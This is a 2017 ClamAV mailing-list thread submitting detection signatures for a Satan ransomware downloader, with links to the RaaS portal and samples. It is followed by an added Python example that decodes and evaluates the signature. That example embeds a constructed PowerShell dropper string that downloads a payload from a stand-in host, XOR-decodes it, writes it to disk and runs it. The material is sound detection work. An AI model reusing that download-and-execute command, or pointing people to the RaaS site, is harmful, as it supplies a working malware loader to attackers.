[Community-sigs] Satan Ransomware RaaS downloader

Christopher Marczewski cmarczewski at sourcefire.com
Mon Apr 10 13:37:31 EDT 2017


Askar,

We have finished reviewing the signatures. They should be published soon.
I'm hopeful that they'll pass FP testing; engines on VirusTotal have yet to
alert on these downloaders.

Thanks again for the submission, & good catch!

On Mon, Apr 10, 2017 at 11:58 AM, Askar Dyussekeyev <dyussekeyev at yandex.kz> wrote:

> Info:
> - https://satan6dll23napb5.onion.to/droppers (RaaS website, need to register)
>
> Samples:
> - https://virustotal.com/ru/file/0a3f919eba596900a1b6e793a30904c85a38d9ec0b882e6327607105adaefb5f/analysis/1491839688/
> - https://virustotal.com/ru/file/14e1b29392ac3ad11c342343383a1bd81e016c542ab5031a146a135d5df0b02e/analysis/1491839764/
>
> 02.04.2017, 02:41, "Askar Dyussekeyev" <dyussekeyev at yandex.kz>:
> > Hello!
> >
> > There is a simple logical signature for the Satan Ransomware RaaS downloader (classified as a "dropper" on the RaaS website) that looks for specific strings (in HTML and TEXT format):
> >
> > Win.Downloader.Satan.HTML;Engine:51-255,Target:3;0&1&2&3&4&5&(6>1)&7&8&9&10&11&12&13&14;706F7765727368656C6C;657865637574696F6E706F6C696379;627970617373;77696E646F777374796C65;68696464656E;636F6D6D616E64;6E65772D6F626A656374;73797374656D2E6E65742E776562636C69656E74;646F776E6C6F616464617461;636F756E74;6C656E677468;62786F72;73797374656D2E636F6E76657274;7772697465616C6C6279746573;7368656C6C65786563757465
> >
> > Win.Downloader.Satan.TXT;Engine:51-255,Target:7;0&1&2&3&4&5&(6>1)&7&8&9&10&11&12&13&14;706F7765727368656C6C;657865637574696F6E706F6C696379;627970617373;77696E646F777374796C65;68696464656E;636F6D6D616E64;6E65772D6F626A656374;73797374656D2E6E65742E776562636C69656E74;646F776E6C6F616464617461;636F756E74;6C656E677468;62786F72;73797374656D2E636F6E76657274;7772697465616C6C6279746573;7368656C6C65786563757465
> >
> > Best regards,
> > Askar
> > _______________________________________________
> > Community-sigs mailing list
> > Community-sigs at lists.clamav.net
> > http://lists.clamav.net/cgi-bin/mailman/listinfo/community-sigs
> >
> > http://www.clamav.net/contact.html#ml



-- 
Christopher Marczewski
Research Engineer
Talos Group
cmarczewski at sourcefire.com
Phone: 443.832.2975
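To make the posted signature concrete, here is an added example (not from the list post and not ClamAV's own code) that parses the TXT signature above, decodes its hex subsignatures back into the PowerShell strings they stand for, counts how often each string occurs in a text, and evaluates the logical expression 0&1&2&3&4&5&(6>1)&7&8&9&10&11&12&13&14 over those counts. The PowerShell one-liner it scans is constructed to have the shape the subsignatures describe; it is not the sample from the VirusTotal links. Two simplifications are assumptions of this toy evaluator rather than ClamAV behaviour: text normalisation is approximated by lowercasing and collapsing whitespace, and & and | are applied left to right.

```python
import re

# The TXT signature as posted; the HTML variant differs only in its target
# block (Target:3 instead of Target:7).
SIGNATURE = (
    "Win.Downloader.Satan.TXT;Engine:51-255,Target:7;"
    "0&1&2&3&4&5&(6>1)&7&8&9&10&11&12&13&14;"
    "706F7765727368656C6C;657865637574696F6E706F6C696379;627970617373;"
    "77696E646F777374796C65;68696464656E;636F6D6D616E64;6E65772D6F626A656374;"
    "73797374656D2E6E65742E776562636C69656E74;646F776E6C6F616464617461;"
    "636F756E74;6C656E677468;62786F72;73797374656D2E636F6E76657274;"
    "7772697465616C6C6279746573;7368656C6C65786563757465"
)

# Constructed stand-in for a download-decode-execute dropper of the shape the
# subsignatures describe. It is NOT the real sample linked above.
DROPPER = """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
$d=(New-Object System.Net.WebClient).DownloadData('http://example.invalid/payload');
$k=[byte[]](0x53,0x61,0x74);
for($i=0;$i -lt $d.Count;$i++){$d[$i]=$d[$i] -bxor $k[$i % $k.Length]};
$p=[System.IO.Path]::Combine($env:TEMP,[System.Convert]::ToString(7)+'.exe');
[System.IO.File]::WriteAllBytes($p,$d);
(New-Object -ComObject Shell.Application).ShellExecute($p)"
"""

# Constructed benign admin one-liner: shares a few strings, not the whole set.
BENIGN = ("powershell -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient)"
          ".DownloadFile('http://example.invalid/a.txt','a.txt')\"")

# Same dropper with only one New-Object, to show the (6>1) clause doing its job.
NEAR_MISS = DROPPER.replace("(New-Object -ComObject Shell.Application)", "$sh")


def parse_logical_signature(sig):
    """Split a .ldb line into (name, target block, expression, decoded subsigs).
    Plain hex subsignatures only; wildcards such as ?? or {n-m} are out of scope."""
    name, target_desc, expr, *subsigs = sig.strip().split(";")
    patterns = [bytes.fromhex(s).decode("latin-1") for s in subsigs]
    return name, target_desc, expr, patterns


def normalize(text):
    """Assumption: crude stand-in for ClamAV's text normalisation (lowercase,
    collapsed whitespace). It is enough to show why the subsigs are lowercase."""
    return re.sub(r"\s+", " ", text.lower())


def subsig_counts(patterns, text):
    """Number of (possibly overlapping-free) occurrences of each subsig."""
    norm = normalize(text)
    return [norm.count(p) for p in patterns]


TOKEN = re.compile(r"\d+|[()&|<>=]")


def evaluate(expr, counts):
    """Evaluate a logical expression over per-subsig match counts.
    Supported: bare ids (matched at least once), (id>n)/(id<n)/(id=n),
    '&', '|' and parentheses. Assumption: '&' and '|' bind left to right."""
    tokens = TOKEN.findall(expr)
    if "".join(tokens) != expr.replace(" ", ""):
        raise ValueError("unsupported characters in expression: %r" % expr)
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("unexpected end of expression")
        tok = tokens[pos]
        pos += 1
        return tok

    def primary():
        tok = take()
        if tok == "(":
            val = expression()
            if take() != ")":
                raise ValueError("unbalanced parentheses")
            return val
        if not tok.isdigit():
            raise ValueError("unexpected token %r" % tok)
        n = counts[int(tok)]
        if peek() in ("<", ">", "="):          # e.g. (6>1): subsig 6 seen more than once
            op, bound = take(), int(take())
            return {"<": n < bound, ">": n > bound, "=": n == bound}[op]
        return n > 0                           # bare id: matched at least once

    def expression():
        val = primary()
        while peek() in ("&", "|"):
            op, rhs = take(), primary()
            val = (val and rhs) if op == "&" else (val or rhs)
        return val

    result = expression()
    if pos != len(tokens):
        raise ValueError("trailing tokens in expression")
    return result


def scan(sig, text):
    """Return the signature name if the text matches, else None."""
    name, _target, expr, patterns = parse_logical_signature(sig)
    return name if evaluate(expr, subsig_counts(patterns, text)) else None


if __name__ == "__main__":
    for label, text in (("dropper", DROPPER), ("benign", BENIGN), ("near miss", NEAR_MISS)):
        print(label, "->", scan(SIGNATURE, text))
```

The (6>1) clause is the interesting part of the expression: new-object has to appear at least twice, which fits a script that creates a WebClient to fetch the payload and then a second COM object to ShellExecute the written file; a script with a single New-Object falls through even though every other string is present. Because the remaining subsignatures are ordinary PowerShell download-and-run vocabulary, the FP testing Chris mentions is what actually decides whether the signature is safe to ship.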